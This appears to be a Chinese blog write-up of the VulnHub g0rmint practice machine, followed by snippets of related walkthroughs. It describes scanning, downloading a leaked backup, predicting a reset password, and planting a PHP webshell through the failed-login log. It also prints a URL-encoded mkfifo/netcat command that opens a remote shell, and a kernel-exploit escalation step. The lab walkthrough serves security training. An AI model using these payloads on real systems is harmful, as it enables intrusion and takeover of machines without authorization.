靶机实战(g0rmint)

最新推荐文章于 2024-01-11 12:00:00 发布
最新推荐文章于 2024-01-11 12:00:00 发布
阅读量433 收藏
点赞数
分类专栏: 靶机实战 文章标签: 靶机 网络安全 渗透测试 靶机练习 vulnhub 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/107127805
版权

g0rmint

实验环境

靶机:g0rmint
测试机:kali(IP:192.168.186.128),win10

实验过程

信息收集

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

在这里插入图片描述

服务发现

在这里插入图片描述
查看web主页,没有主页
在这里插入图片描述

目录扫描

robots.txt
在这里插入图片描述

漏洞发现

找到/gormint/目录
在这里插入图片描述
在这里插入图片描述
查看网页源码关键字author,keyword尝试爆破,backup-directory备份文件
在这里插入图片描述
访问http://192.168.186.131/g0rmint/s3cretbackupdirect0ry/
在这里插入图片描述
再用dirb去扫该目录
在这里插入图片描述
关键字backup.zip,访问http://192.168.186.131/g0rmint/s3cretbackupdirect0ry/backup.zip下载
在这里插入图片描述
在这里插入图片描述

漏洞利用

源码审计
查看config.php文件,addlog函数添加日志文件,文件名年月日,在s3cr3t-dir3ct0ry-f0r-l0gs/目录下
在这里插入图片描述
查看login.php 将登录失败的邮箱添加到日志里
在这里插入图片描述
尝试用一句话作为邮箱登录,访问日志文件http://192.168.186.131/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-07-04.php。但需要登陆
在这里插入图片描述
查看reset.php,重置密码为年月日时分秒的sha1加密
在这里插入图片描述
css/style.css文件下找到用户名,邮箱
在这里插入图片描述
尝试重置密码
在这里插入图片描述
在这里插入图片描述
登录
在这里插入图片描述
重新访问日志文件
在这里插入图片描述
写入一句话
在这里插入图片描述
在这里插入图片描述

反弹shell

反弹shell(主要是通过创建管道通信连接)
‘mkfifo /tmp/t’;
‘cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t‘;
用url部分编码后分两步执行

%60mkfifo%20%2ftmp%2ft%60%3B

%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

在这里插入图片描述

提权

版本提权
在这里插入图片描述
在这里插入图片描述
编译
在这里插入图片描述
开启简易web服务python -m SimpleHTTPServer 8080
在这里插入图片描述
下载运行
在这里插入图片描述
在这里插入图片描述

总结

1.基本的源码审计,也可找网站对应的cms源码,进行审计.
2.对于日志文件(ssh登录,web访问,web登录等),写入一句话访问,或利用文件包含进行访问,解析漏洞等进行访问.

~~...
关注
专栏目录
vulnhub】---g0rmint靶机
qq_43168364的博客
08-22 458
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机g0rmint靶机(192.168.15.156) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 命令:masscan --rate=10000 --po
靶机渗透(十)g0rmint
qq_42180996的博客
05-22 1675
靶机g0rmint 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.访问/robots.txt 4.代码审计 5.重置密码 6....
靶机实战-g0rmint
滕财然的博客
01-30 761
g0rmint靶机实战 文章目录g0rmint靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、getshell反弹shell方法一反弹shell方法二6、提权方法一方法二 1、主机发现 目标IP:192.168.232.165 2、端口扫描 开放80、22端口 3、端口详细信息扫描 4、访问80端口–http服务 dirb扫一下其它目录 依次访问:...
kali渗透综合靶机(十四)--g0rmint靶机
W小哥
03-30 689
一、靶机下载 下载链接:https://www.vulnhub.com/entry/g0rmint-1,214/ 二、g0rmint靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.10 1、主机发现 2、端...
渗透测试靶场练习(二)之g0rmint
习惯积淀的博客
04-09 901
渗透测试g0rmint 信息搜集 arp-scan扫描 查找到IP为192.168.24.131的主机为靶机 主机探测 发现有22端口和web的80端口,扫描网站目录获得robots.txt 打开robots.txt发现/g0rmint/路径,打开是一个登陆界面,在源码中发现备份文件 打开发现文件不存在,应该是在这个目录下,使用dirb扫描发现info.php,打开提示有backup....
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机g0rmint练习:php一句话写入登录失败日志反弹shell,利用版本漏洞提权
7Riven's blog
01-07 637
1.主机发现 2.端口扫描 3.访问80端口看看 果然404页面,看看robots.txt 4.目录扫描 用dirbuster扫描看看 依次快速访问完目录后未发现有用信息,就先从登录界面仔细找找 查看下源码 直接访问试试,没什么结果 扫描该目录下还有哪些文件 只找到了一个,访问看看 有一个压缩后门文件,尝试下载看看 解压后如下: ...
靶机操作练习,earth 靶机实战练习
09-08
通过这样的实战练习,我们可以更深入地理解网络攻防技术,提高安全意识和应对能力。同时,这也提醒我们,对于系统安全,应确保及时更新补丁,限制不必要的服务,以及设置强密码,以防止类似攻击的发生。
靶机记录(五):g0rmint
weixin_47306547的博客
10-29 349
目录 主机发现 端口扫描 FTP Web渗透 目录扫描 漏洞挖掘 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 FTP Web渗透 目录扫描 漏洞挖掘 代码分析 从重置密码入手 看之前写入的一句话木马(登录状态下) GetShell 依次执行: HACK=`mkfifo /tmp/t`; HACK=%60mkfifo%20%2ftmp%2ft%60%3B HACK=`cat...
g0rmint 靶机渗透
weixin_44769042的博客
10-12 365
靶机记录--2 主机发现 nmap -sn 网段 端口扫描 扫到个22,80 先去web端 结果主页直接404 扫下目录吧 就这俩个正常 web渗透 访问一下robots里的目录 自动跳转了一个登录页面 忘记密码找回页面 随便试了几下没什么反应 F12来看看登录页 在这发现了一个叫做备份目录的路径 访问一下结果404了 试试再扫一下这里的目录,,因为从g0rmint目录开始,都是在robots里新找到的,再扫一遍可能有情况 .
[[IndiShell Lab]]靶机实验
qq_42890862的博客
06-30 661
一、nmap扫描192.168.6.0网段存活主机 二、扫描各个ip的80端口是否开启(发现192.168.6.1/10/12/105中80端口开启) 三、测试发现192.168.6.12为目标网站,对其进行详细扫描 四、进入该网站首页 五、通过目录扫描,发现以下目录root@kali:~# dirb “http://192.168.6.12” 六、进入到各目录页面中 此页面提示有蹊跷!!!! 七、在url中写入路径发现页面没有变化,则判断数据提交方式为post,在test.php页面中使用hackbar
vulnhub-DC7靶机实验
m0_64118193的博客
12-03 183
官网地址: https://download.vulnhub.com/dc/DC-6.zip 靶机文件下载后导入即可使用,靶机只有一个flag值 DC6靶机IP地址: 192.168.18.128 kali攻击机IP地址:192.168.18.101 开放端口,,我们进行网站登陆 在主机上进行查询用户信息 下载文件后进行解压,在中发现有用信息 用户名 密码 是一种基于密钥的加密方式,使用了一对密钥对消息进行,来保证消息的安全传输格式是用来加密文件的。 如果这个文件可写,那么直接就可以了。使用看一下权限,
g0rmint 渗透测试
Darklord.W
04-14 643
g0rmint渗透测试 0x00实验环境 靶机g0rmint,IP地址:192.168.8.143 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web 扫描web目录 访问robots.txt 扫描该目录下子目录并访问 ...
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2893
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
多节点实验靶机练习(二)
guowenkecom的博客
11-22 412
目录项目名称:实验环境:靶机下载地址:实验要求:所需工具:环境搭建项目实施1. 测试网站的访问性2.信息收集3.漏洞探寻及利用 项目名称: 实验靶机练习(二) 实验环境: Linux内网机器两台 window 2003 一台 win2003 为外网可以访问到的机器 网卡为nat IP为192.168.100.130 靶机下载地址: 实验要求: 找到三个flag,禁止在实验过程中操作虚拟机 所需工具...
靶机实战(bulldog)
weixin_45605313的博客
05-28 399
bulldog实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.web站指纹5.漏洞发现漏洞利用提权总结 实验环境 靶机:bulldog 测试机:win10 ,kali 实验过程 信息收集 1.主机发现 靶机ip:192.168.238.146 2.端口扫描 先用masscan进行快速全面的扫描 nmap扫描得到端口服务信息 3.目录扫描 访问80,web服务进行目录扫描 4.web站指纹 以python环境搭建web 5.漏洞发现 1.尝试ssh弱口令:利用msf,hydra等
靶机实战(fristileaks)
weixin_45605313的博客
06-30 312
fristileaks实验环境实验过程信息收集主机发现端口扫描服务扫描目录扫描漏洞发现漏洞利用总结 实验环境 靶机:fristileaks 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -i eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rat
Neos的渗透测试靶机练习——DC-6
最新发布
qq_38678845的博客
01-11 968
一次渗透测试练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值